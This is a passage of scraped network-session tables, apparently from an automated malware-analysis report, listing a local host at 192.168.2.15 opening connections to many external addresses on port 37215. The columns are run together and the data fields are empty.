                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27563192.168.2.1548804157.231.109.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27564192.168.2.1544612171.186.138.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27565192.168.2.153341631.85.7.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27566192.168.2.1551196181.225.140.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27567192.168.2.1557712102.17.40.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27568192.168.2.1537410197.144.154.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27569192.168.2.1554916157.186.187.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27570192.168.2.156092041.147.203.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27571192.168.2.1548770156.25.154.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27572192.168.2.1560954138.248.67.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27573192.168.2.1542218156.148.45.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27574192.168.2.154355694.8.164.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27575192.168.2.1540380121.87.168.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27576192.168.2.155864637.54.4.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27577192.168.2.1538386186.48.186.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27578192.168.2.1553852121.200.224.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27579192.168.2.154749837.75.57.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27580192.168.2.154872831.9.254.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27581192.168.2.1537780102.35.10.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27582192.168.2.1549336181.90.58.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27583192.168.2.1548306121.178.115.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27584192.168.2.153950494.61.249.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27585192.168.2.1537042156.59.1.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27586192.168.2.1541584157.105.160.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27587192.168.2.153379637.201.255.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27588192.168.2.153960241.68.146.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27589192.168.2.155502294.8.68.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27590192.168.2.1545774138.10.170.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27591192.168.2.155994837.99.169.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27592192.168.2.154676245.213.41.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27593192.168.2.154240031.42.107.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27594192.168.2.1553128186.233.99.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27595192.168.2.1534854186.56.209.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27596192.168.2.154334841.6.35.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27597192.168.2.1536500138.244.163.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27598192.168.2.153378837.59.70.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27599192.168.2.1551952122.175.125.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27600192.168.2.154951657.123.136.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27601192.168.2.1533612181.127.205.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27602192.168.2.1542376102.120.179.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27603192.168.2.1541322156.86.107.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27604192.168.2.1550676142.233.185.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27605192.168.2.1550924181.223.120.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27606192.168.2.153448637.40.188.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27607192.168.2.154586445.253.87.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27608192.168.2.153277637.25.203.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27609192.168.2.1537148190.106.195.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27610192.168.2.1559220186.214.183.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27611192.168.2.1532954190.236.43.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27612192.168.2.155274641.189.114.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27613192.168.2.1553170186.131.217.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27614192.168.2.1544130190.179.85.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27615192.168.2.1540338186.41.232.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27616192.168.2.1540462122.142.194.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27617192.168.2.153429841.95.208.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27618192.168.2.1541514181.40.203.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27619192.168.2.1549000138.244.158.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27620192.168.2.1555576102.25.122.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27621192.168.2.1543750217.238.215.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27622192.168.2.1555770138.85.65.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27623192.168.2.1556988197.90.153.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27624192.168.2.155859245.149.213.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27625192.168.2.1548542186.125.39.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27626192.168.2.1545590197.40.140.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27627192.168.2.1544256190.215.182.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27628192.168.2.1548410102.11.18.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27629192.168.2.1549200181.240.247.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27630192.168.2.154094045.161.91.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27631192.168.2.1549244222.100.114.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27632192.168.2.1555608190.185.25.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27633192.168.2.153448237.97.72.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27634192.168.2.1547104222.168.211.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27635192.168.2.1553556157.121.67.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27636192.168.2.154051494.182.83.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27637192.168.2.153638631.107.210.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27638192.168.2.1551780222.17.157.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27639192.168.2.1546216121.13.110.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27640192.168.2.1542400122.191.29.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27641192.168.2.1544264222.89.187.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27642192.168.2.156075231.39.77.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27643192.168.2.154716041.58.105.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27644192.168.2.1537514102.34.228.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27645192.168.2.1538510121.43.167.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27646192.168.2.1537192216.91.165.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27647192.168.2.1556090102.246.118.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27648192.168.2.153306041.47.188.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27649192.168.2.1533300138.28.53.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27650192.168.2.1548912122.19.73.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27651192.168.2.154595241.100.122.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27652192.168.2.1534908102.244.79.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27653192.168.2.153645425.87.178.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27654192.168.2.1542592156.212.118.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27655192.168.2.155514845.5.211.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27656192.168.2.1553400138.189.70.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27657192.168.2.1552142102.120.83.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27658192.168.2.1555372190.105.231.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27659192.168.2.1558978186.184.51.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27660192.168.2.1540854181.183.53.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27661192.168.2.1558848190.145.52.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27662192.168.2.154751245.102.188.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27663192.168.2.1542822157.91.157.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27664192.168.2.1543984197.242.171.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27665192.168.2.1539142121.71.184.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27666192.168.2.154768431.176.189.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27667192.168.2.1553956161.162.182.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27668192.168.2.1539142121.41.136.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27669192.168.2.1552050222.31.92.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27670192.168.2.1541302186.197.27.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27671192.168.2.154536631.49.214.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27672192.168.2.1538640122.78.9.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27673192.168.2.1532964102.137.123.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27674192.168.2.153441294.97.156.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27675192.168.2.153501431.161.229.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27676192.168.2.1538906190.89.244.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27677192.168.2.1534596122.74.126.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27678192.168.2.1553342102.38.156.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27679192.168.2.1542892181.44.101.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27680192.168.2.154554431.144.22.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27681192.168.2.1553304197.103.170.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27682192.168.2.156009631.42.72.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27683192.168.2.1560034157.63.123.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27684192.168.2.1542364122.127.54.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27685192.168.2.1540248149.185.249.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27686192.168.2.1550956121.231.185.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27687192.168.2.1546624138.252.194.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27688192.168.2.155845631.3.98.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27689192.168.2.153730894.197.192.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27690192.168.2.1550360156.129.82.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27691192.168.2.1538974197.240.107.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27692192.168.2.1541946186.124.160.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27693192.168.2.1559044122.180.156.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27694192.168.2.1536170156.155.78.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27695192.168.2.155490094.74.122.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27696192.168.2.1540634138.1.244.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27697192.168.2.155670637.224.110.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27698192.168.2.1540910197.179.88.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27699192.168.2.1543560222.194.186.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27700192.168.2.154641431.117.251.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27701192.168.2.155425241.222.105.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27702192.168.2.1554340156.73.28.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27703192.168.2.1554766158.61.224.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27704192.168.2.1555300186.98.232.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27705192.168.2.154847837.250.98.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27706192.168.2.1559952122.243.171.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27707192.168.2.1555378157.205.46.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27708192.168.2.1543880122.75.17.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27709192.168.2.1551560138.172.143.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27710192.168.2.153277494.188.113.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27711192.168.2.154215845.133.101.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27712192.168.2.1534290222.95.84.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27713192.168.2.1538464222.232.65.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27714192.168.2.155481045.9.213.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27715192.168.2.153585294.234.246.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27716192.168.2.1535890186.130.31.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27717192.168.2.1533882190.139.113.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27718192.168.2.153365045.81.186.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27719192.168.2.1545074157.34.11.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27720192.168.2.153431645.54.234.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27721192.168.2.1542228181.236.126.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27722192.168.2.1554504190.240.152.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27723192.168.2.155921437.118.56.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27724192.168.2.1535726122.99.26.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27725192.168.2.153432094.67.198.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27726192.168.2.153838694.32.47.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27727192.168.2.154064231.226.28.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27728192.168.2.1541130138.100.168.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27729192.168.2.1549590122.3.217.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27730192.168.2.153973041.119.9.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27731192.168.2.1546688190.231.18.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27732192.168.2.1548396122.138.49.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27733192.168.2.156030237.19.63.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27734192.168.2.1543278197.194.218.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27735192.168.2.1535468122.37.68.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27736192.168.2.1540614156.44.234.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27737192.168.2.1537396197.169.27.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27738192.168.2.1537726138.0.215.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27739192.168.2.1534516138.143.64.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27740192.168.2.1560898102.86.188.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27741192.168.2.155958845.144.132.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27742192.168.2.1538668138.194.159.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27743192.168.2.1553786121.73.245.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27744192.168.2.155952637.165.237.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27745192.168.2.154605045.115.45.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27746192.168.2.1536824122.82.38.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27747192.168.2.1548180138.3.43.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27748192.168.2.1548778190.166.233.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27749192.168.2.1554696121.254.183.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27750192.168.2.1555814102.0.26.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27751192.168.2.1550264181.30.138.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27752192.168.2.154801494.118.172.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27753192.168.2.1532818186.78.165.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27754192.168.2.155511431.8.131.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27755192.168.2.1546078156.81.61.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27756192.168.2.1541300156.104.163.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27757192.168.2.153838241.31.201.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27758192.168.2.1542302157.186.149.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27759192.168.2.1538146222.17.141.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27760192.168.2.1555048217.153.155.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27761192.168.2.1533872121.79.192.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27762192.168.2.1533080197.7.37.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27763192.168.2.1558682222.215.191.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27764192.168.2.1558194190.179.132.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27765192.168.2.1548250186.153.132.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27766192.168.2.154911041.119.26.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27767192.168.2.1547452102.197.33.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27768192.168.2.1553132181.99.2.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27769192.168.2.154177431.97.138.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27770192.168.2.1560574181.50.79.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27771192.168.2.1543864197.170.10.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27772192.168.2.154755041.63.92.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27773192.168.2.1556074181.122.96.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27774192.168.2.1544002170.110.56.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27775192.168.2.1550088222.92.228.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27776192.168.2.155151645.118.196.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27777192.168.2.154976231.114.143.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27778192.168.2.1560374222.113.63.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27779192.168.2.154198645.94.4.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27780192.168.2.153909241.84.196.21337215
                                              TimestampBytes transferredDirectionData


